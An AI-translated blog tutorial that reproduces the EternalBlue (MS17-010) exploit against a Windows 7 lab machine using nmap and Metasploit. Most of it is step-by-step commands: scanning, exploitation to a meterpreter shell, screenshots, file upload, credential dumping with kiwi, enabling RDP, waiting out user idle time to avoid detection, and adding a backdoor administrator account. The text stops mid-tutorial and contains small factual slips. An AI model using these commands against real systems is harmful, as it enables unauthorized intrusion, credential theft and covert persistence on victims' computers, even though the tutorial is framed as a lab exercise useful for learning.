明国三年一场雨

明国三年一场雨

热爱技术分享
telegram
email
HomeArchives

Kali - MSF EternalBlue Detailed Explanation (Reproduction, Demonstration, Remote, Backdoor, Packing, Fixing)

218
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
"Eternal Blue is a cyberattack that exploits a vulnerability in Windows systems to gain control over computers. It was used to create the WannaCry program in May 2017, affecting organizations worldwide. The attack involves scanning for vulnerable systems, exploiting the Eternal Blue vulnerability, and gaining control over the target computer. The attacker can then capture screenshots, upload files, and even enable remote desktop access to the compromised system."

  1. Overview of Eternal Blue
    Eternal Blue, which erupted on the evening of April 14, 2017, is a vulnerability that exploits the SMB protocol in Windows systems to gain the highest level of system privileges and control the compromised computer. Even on May 12, 2017, malicious individuals used the "Eternal Blue" to create the WannaCry program, which affected a wide range of institutions worldwide, including schools, large enterprises, and governments. The only way to recover files was to pay a high ransom. However, Microsoft patched the program shortly after its release.

  2. SMB Protocol
    SMB (Server Message Block) is a protocol for server message blocks. It is a client/server, request/response protocol that allows for file sharing, printer sharing, named pipes, and other resources between computers. The "Network Neighborhood" on a computer relies on SMB. The SMB protocol works at the application layer and session layer and can be used on top of the TCP/IP protocol. SMB uses TCP port 139 and TCP port 445.

  3. Preparation
    Virtual Machine: VMware
    Target Machine: Windows 7 (IP: 192.168.184.138) Image Download https://msdn.itellyou.cn/
    Attacker Machine: Kali (IP: 192.168.184.130)
    Tools: nmap and Metasploit (MSF) in Kali

  4. Vulnerability Reproduction

    1. Host Discovery
      a. Prerequisite: Disable the firewall on Win7.

      Not disabling the firewall may result in nmap not scanning its ports and MSF not being able to exploit the Eternal Blue vulnerability.

      e23cdf6b9ef8483dbaab85280976b2d8

      You can use ipconfig or ifconfig to check the IP addresses of Win7 and Kali separately:

      Win7

      48a16ab60d3542bf84786264db100530

      46eb54d6f0ea4f4b98a85a6c549d1a8f

    2. Host Discovery using nmap in Kali

      IP Address: +

      8de5ec95fc724470b7bef85661bc6a25

      4b4ae4984c224383918639575ade095a

      Class A: 10.0.0.0~10.255.255.255
      Class B: 172.16.0.0~173.31.255.255
      Class C: 192.168.0.0~192.168.255.255
      /24 represents 24 ones, which means the subnet mask is 255.255.255.0
      192.168.184.0/24: The number after "/" controls the subnet mask of the preceding IP address, indicating how many bits can vary afterwards.

      nmap -sP 192.168.184.0/24  #sP (ping scan)

    3. Host Discovery using Metasploit (MSF) in Kali

      msfconsole                                 // Start MSF
use auxiliary/scanner/discovery/arp_sweep  // Use the module
set rhosts 192.168.184.0/24   // Set the scan range
set threads 50             // Increase the number of threads
run                        // Run

      MSF searches for the Eternal Blue vulnerability by entering search ms17-010 (Microsoft Eternal Blue code ms17-010)

      8f84118572c44dccbe8c72bc34a800fa

      1. blue is the Eternal Blue vulnerability.
      2. psexec is a usable module in JavaScript (JS).
      3. command runs cmd.
      4. The last one is a detection module.

      a. First, let's use the detection module to see if our Win7 machine may have the vulnerability.

      use exploit/windows/smb/ms17_010_eternalblue
show options 
set rhosts 192.168.184.138
exploit/run

      ddbdc3fe73cd43ffacde905d7542aeae

      3dfa57568df044f8ac84451816afa5da

      f5d8bd05408245419f687026820fafc2

      If successful, the meterpreter > prompt will appear.
      Meterpreter is an extension module of Metasploit that allows for more in-depth penetration of the target system, such as entering cmd, capturing the screen, uploading/downloading files, creating persistent backdoors, etc.

      meterpreter > shell
chcp 65001  // Convert encoding to avoid garbled characters
ipconfig  # Check IP
whoami    # Check current username

    4. Capture the screen

      meterpreter > screenshot   # Take a screenshot

      3493fa2eeaab4206aa4f52f01c85e297

    5. Upload files

      meterpreter > upload user.txt c://

      cde448f0dc1a406fa3761972a95471ab

    6. Remote login
      Use the kiwi module to view passwords:

      Using the kiwi module requires system administrator privileges:

      meterpreter > load kiwi // Load the kiwi module
Loading extension kiwi...Success.
creds_all  # List all credentials
exit   # Exit

      62116dcd7485412c9ee980ac048777bb

      Start port 3389 on MSF's target machine

      By default, Windows Remote Desktop is not allowed:

      a31c8778455c4fcb81ebf5d319142ab3

      We can't manually allow remote connections on Win7, otherwise, how can we call ourselves hackers, hahaha...

      Start port 3389 on Win7, which is the Remote Desktop Protocol. Execute the remote connection command:

      meterpreter > run post/windows/manage/enable_rdp  // Enable port 3389 for remote desktop on the target host
meterpreter > idletime  // Check the idle time of remote users and wait for a long idle time before remote login to reduce the risk of being discovered.

      f4d49ffad874458cbc72278a9334fe3a

      c9008e1a7aa34328a053c8a32c5e2cc3

      04d631dfda364caeabe7c0ba4b947a09

      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop

      Since this way we log in to the Win7 user, the user on Win7 will be logged out:
      Create a user:

      So we need to create a new user to log in:

      meterpreter > shell            # Enter the command line
net user kill 123 /add         # Create a new user "kill" with password "123"
net localgroup administrators kill /add # Add the user "kill" to the local administrators group of Win7 to obtain administrator privileges
net user               # Check users

      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.